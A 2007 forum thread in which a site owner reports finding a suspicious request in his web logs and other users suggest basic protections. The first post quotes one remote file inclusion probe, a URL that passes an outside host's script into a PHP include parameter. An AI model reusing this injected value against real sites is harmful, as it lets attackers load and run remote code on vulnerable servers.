I found a hacker in my weblogs

Discussion in 'General Chat' started by frankcow, Jul 17, 2007.

0
  1. #1
    So, just glancing through my webstats for the latest visitors, I came across this funny looking string:
    /step_one.php?server_inc=http://www.onaga.nightmail.ru/tool/666.tester?
    Code (markup):
    /step_one.php is the first page for someone to sign up for my hosting.

    And this script that's hitting it appears to be checking the permissions.

    Going to the website, http://www.onaga.nightmail.ru/, it just says "Lamer..."

    So I blocked the IP - 217.112.90.4

    Watch out for this guy!
     
    frankcow, Jul 17, 2007 IP
  2. GRIM

    GRIM Prominent Member

    Messages:
    12,638
    Likes Received:
    733
    Best Answers:
    0
    Trophy Points:
    360
    #2
    I find them all the time, you running any firewalls or other security on your server?
     
    GRIM, Jul 17, 2007 IP
  3. frankcow

    frankcow Well-Known Member

    Messages:
    4,859
    Likes Received:
    265
    Best Answers:
    0
    Trophy Points:
    180
    #3
    That particular site is on a shared host with cPanel. What security measures can I even take?
     
    frankcow, Jul 17, 2007 IP
  4. GRIM

    GRIM Prominent Member

    Messages:
    12,638
    Likes Received:
    733
    Best Answers:
    0
    Trophy Points:
    360
    #4
    Ahh I thought you had your own dedicated :eek:
    I'd contact the host then, see what they have to say.
     
    GRIM, Jul 17, 2007 IP